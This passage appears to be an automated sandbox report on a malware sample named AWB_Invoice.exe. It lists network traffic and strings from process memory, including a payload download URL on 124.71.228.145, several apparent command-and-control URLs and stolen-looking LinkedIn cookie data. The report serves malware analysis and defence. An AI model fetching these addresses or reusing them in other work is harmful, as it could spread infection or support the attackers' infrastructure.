61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Apr 2023 13:09:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: unknownTCP traffic detected without corresponding DNS query: 124.71.228.145
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
      Source: control.exe, 00000006.00000002.66860601424.00000000050DC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
      Source: control.exe, 00000006.00000002.66849658014.0000000002FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
      Source: control.exe, 00000006.00000002.66849658014.0000000002FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
      Source: control.exe, 00000006.00000002.66860601424.0000000005488000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://103.60.164.103:98
      Source: control.exe, 00000006.00000002.66860601424.0000000005F86000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://121.54.162.115/tz.js
      Source: AWB_Invoice.exe, 00000004.00000003.62231140608.00000000052EE000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://124.71.228.145/
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.0000000005298000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231140608.00000000052E2000.00000004.00000020.00020000.00000000.sdmp, AWB_Invoice.exe, 00000004.00000003.62231910856.00000000052E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://124.71.228.145/sCgFrPXHcEhHCJiO9.bin
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.0000000005298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://124.71.228.145/sCgFrPXHcEhHCJiO9.bin2
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://124.71.228.145/sCgFrPXHcEhHCJiO9.binX
      Source: AWB_Invoice.exe, 00000004.00000002.62364598313.00000000052D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://124.71.228.145/sCgFrPXHcEhHCJiO9.binp
      Source: control.exe, 00000006.00000002.66860601424.0000000005488000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://58.220.32.210:98/
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSign
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: explorer.exe, 00000007.00000003.63606348477.0000000010241000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: control.exe, 00000006.00000002.66860601424.0000000004F33000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.66852860686.000000000497D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: explorer.exe, 00000007.00000003.63606348477.0000000010241000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: explorer.exe, 00000007.00000003.63606348477.0000000010241000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: control.exe, 00000006.00000002.66860601424.0000000004F33000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.66852860686.000000000497D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: AWB_Invoice.exe, 00000001.00000000.61805247920.000000000040A000.00000008.00000001.01000000.00000003.sdmp, AWB_Invoice.exe, 00000001.00000002.62248906995.000000000040A000.00000004.00000001.01000000.00000003.sdmp, AWB_Invoice.exe, 00000004.00000000.62105966614.000000000040A000.00000008.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000002.66860601424.0000000004F33000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.66852860686.000000000497D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: explorer.exe, 00000007.00000003.63616079099.0000000010260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63606348477.0000000010241000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0L
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: explorer.exe, 00000007.00000003.63616079099.0000000010260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: control.exe, 00000006.00000002.66860601424.0000000004F33000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.66852860686.000000000497D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
      Source: control.exe, 00000006.00000002.66860601424.0000000005C62000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://sberbankfinances.com/hhgu/?YG8FU6=kRRBQ/bHU/W9UkuDtIhtwygoT2D
      Source: explorer.exe, 00000007.00000003.63616322609.000000000CA34000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
      Source: control.exe, 00000006.00000002.66849658014.0000000002F29000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66863328196.0000000007869000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.angelaedinahj.click/hhgu/?YG8FU6=MGKRN5xfop8yFpZUbDdpXMRyoQmifVjDDm0nZm9wxz38XsKiJK/ovR5R
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.vmware.com/0
      Source: AWB_Invoice.exe, 00000004.00000001.62106830623.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: AWB_Invoice.exe, 00000004.00000001.62106830623.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: control.exe, 00000006.00000002.66863328196.00000000077E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: control.exe, 00000006.00000002.66860601424.00000000052F6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://agtuscany.com/hhgu/?YG8FU6=s2yVyDL7KzYWld2BdQllerQcD/GF6Mxs58UQuk2i21kRVAHqZ0RMsLQ1NbuqhCdXs
      Source: explorer.exe, 00000007.00000003.63616079099.0000000010260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000007.00000003.63616079099.0000000010260000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS0
      Source: explorer.exe, 00000007.00000003.63632047932.0000000010741000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63604117840.000000001073D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000007.00000003.63632047932.0000000010741000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63604117840.000000001073D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/s
      Source: explorer.exe, 00000007.00000003.64574555092.000000000C9E7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000007.00000000.62300767642.0000000009082000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
      Source: explorer.exe, 00000007.00000003.63598041200.000000001067E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.66892389836.0000000010682000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63642983383.0000000010681000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/
      Source: explorer.exe, 00000007.00000003.64572323201.0000000002B6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mx
      Source: explorer.exe, 00000007.00000003.63598041200.000000001067E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.66892389836.0000000010682000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63642983383.0000000010681000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/wu
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
      Source: control.exe, 00000006.00000002.66863328196.00000000077E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
      Source: control.exe, 00000006.00000002.66863328196.00000000077E6000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524088975.0000000007855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: control.exe, 00000006.00000002.66863328196.00000000077E6000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524088975.0000000007855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: control.exe, 00000006.00000002.66863328196.00000000077E6000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524088975.0000000007855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Exo
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
      Source: control.exe, 00000006.00000003.62576801263.0000000007FD2000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
      Source: AWB_Invoice.exe, 00000004.00000001.62106830623.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: control.exe, 00000006.00000003.62512484234.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62512484234.0000000002F84000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66849658014.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
      Source: control.exe, 00000006.00000003.62512484234.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62512484234.0000000002F84000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66849658014.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
      Source: control.exe, 00000006.00000003.62512484234.0000000002F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
      Source: control.exe, 00000006.00000003.62512484234.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62512484234.0000000002F84000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.66849658014.0000000002F84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
      Source: control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
      Source: control.exe, 00000006.00000002.66860601424.0000000004F33000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.66852860686.000000000497D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
      Source: control.exe, 00000006.00000002.66863328196.00000000077E6000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524088975.0000000007855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
      Source: control.exe, 00000006.00000003.62524088975.0000000007855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: explorer.exe, 00000007.00000003.64574555092.000000000C9E7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/Clal
      Source: control.exe, 00000006.00000002.66860601424.00000000062AA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.aizhudai.com/hhgu/?YG8FU6=bwpeorSwTgARiOW1MBWRQEyO68F/6l/AZk25pS7qV2XiEzJGCZ7h2pTHq/m4oG
      Source: AWB_Invoice.exe, 00000001.00000002.62248906995.000000000041E000.00000004.00000001.01000000.00000003.sdmp, control.exe, 00000006.00000003.62524777881.00000000078E8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63598041200.000000001067E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.66892389836.0000000010682000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63642983383.0000000010681000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.63632469609.00000000104D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: control.exe, 00000006.00000002.66863328196.00000000077E6000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.62524088975.0000000007855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
      Source: control.exe, 00000006.00000002.66860601424.0000000006A84000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
